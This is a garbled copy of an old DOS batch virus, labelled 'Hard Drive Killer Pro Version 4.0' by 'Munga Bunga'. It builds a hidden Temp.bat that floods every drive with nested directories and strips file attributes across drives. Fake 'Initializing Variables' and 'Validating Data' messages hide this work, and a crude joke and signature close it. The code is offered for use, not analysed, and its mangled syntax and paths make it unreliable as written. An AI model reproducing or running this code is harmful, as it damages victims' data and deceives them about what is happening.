: Makedir if EXIST C: Temp.bat attrib -r -hc: Temp.bat> Nul Echo @echo off> c: temp.bat echo %% 1: >> C: Temp.Bat Echo CD >> C: Temp. Bat echo: startmd >> C: Temp.bat echo for %%%% A in ("if not exist %% 2NUL MD %% 2" "if exist %% 2NUL CD %% 2") DO %%%% a >> C: Temp.bat echo for %%%% a in ("> ass_hole.txt") DO Echo %%%% a Your Gone @ $$ Hole !!!! >> C: Temp.bat echo if not EXIST %% 1: %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2 %% 2Nul Goto Startmd >> C: Temp.Bat Call Attrib R HC: Temp.bat> NUL
CLS Echo Initializing Variables............................................................................................................................................................................................ ... / U / AutoSample> Nul CLS Echo Initializing Variables... Echo Validating Data... for %% a in (% Drive%) Do Call C: Temp.bat %% A Munga> NUL CLS Echo Initializing Variables...................................................................................................................... Validating data......... For %% a in (% drive%) CALL Attrib -R -H %% A: / S> NUL CALL Attrib R HC: Temp.bat> Nul Call Attrib R HC: autoexec.bat> Nul CLS Echo Initializing Variables... Echo Validating Data................. ...................................................................................................................................................................................................................... %% A: *.> NUL CLS Echo Initializing Variables.. Echo Validating Data... Echo INITIALIZING Application.................... Do Call C: Temp.bat %% a Munga> NUL
CLS Echo Thank you for using a munga bunga products. Echo oh and he is not a get, he is a good looking genius. echo. echo here is a joke for you.. Echo. echo Q). What's the WORST Thing About Being An Egg? Echo a). You ONLY GET LAID ONCE. Echo. Echo Hahahaha, Get It? Don't you just love what one? Echo. Echo regards, echo. Echo munga bunga
: END: END
Rem Hard Drive Killer Pro Version 4.0, Enjoy !!!! Rem Author: Munga Bunga - From Australia, The Land Full of Retarded Australian'S (Help Me Get Out of Here).
